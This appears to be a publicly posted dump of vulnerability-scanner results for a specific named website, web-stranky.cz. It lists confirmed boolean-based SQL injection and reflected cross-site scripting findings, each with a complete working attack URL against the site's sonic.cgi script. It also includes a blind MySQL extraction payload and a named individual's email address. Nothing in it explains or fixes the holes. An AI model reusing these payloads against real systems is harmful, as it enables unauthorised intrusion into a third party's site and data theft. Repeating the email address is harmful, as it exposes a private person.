sroub3k

web-stranky.cz

Feb 4th, 2012
http://web-stranky.cz/

Boolean Based SQL Injection

Severity : Critical
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=' OR 'ns'='ns&page_include=w_reference
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: templ
Parameter Type: Querystring
Attack Pattern: ' OR 'ns'='ns

Severity : Critical
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=' OR 'ns'='ns&page_include=p_top_messages_history&reset=yes
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: templ
Parameter Type: Querystring
Attack Pattern: ' OR 'ns'='ns

Severity : Critical
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=' OR 'ns'='ns&page_include=p_top_messages_reactions&id_top_message=115436
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: templ
Parameter Type: Querystring
Attack Pattern: ' OR 'ns'='ns

Severity : Critical
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=' OR 'ns'='ns&page_include=p_top_messages_history&p_top_messages_stranka=2
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: templ
Parameter Type: Querystring
Attack Pattern: ' OR 'ns'='ns

Severity : Critical
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=w_index&page_include=' OR 'ns'='ns
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: page_include
Parameter Type: Querystring
Attack Pattern: ' OR 'ns'='ns

Severity : Critical
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=w_index&page_include=' OR 'ns'='ns&reset=yes
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: page_include
Parameter Type: Querystring
Attack Pattern: ' OR 'ns'='ns

||| XSS (Cross-site Scripting)

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ='"--></style></script><script>alert(0x000091)</script>&page_include=w_reference
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: templ
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000091)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ='"--></style></script><script>alert(0x000088)</script>&page_include=p_top_messages_history&reset=yes
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: templ
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000088)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ='"--></style></script><script>alert(0x000102)</script>&page_include=p_top_messages_reactions&id_top_message=115436
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: templ
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000102)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ='"--></style></script><script>alert(0x000105)</script>&page_include=p_top_messages_history&p_top_messages_stranka=2
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: templ
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000105)</script>

||| MySQL Database Identified

Severity : Information
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=-w_index'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))-- &page_include=w_reference
Vulnerability Classifications: -
Parameter Name: templ
Parameter Type: Querystring
Attack Pattern: -w_index'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--

||| E-mail Address Disclosure

Severity : Information
Confirmation : Confirmed
Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=w_index&page_include=w_reference
Found E-mails: petr.vyhnalek@web-stranky.cz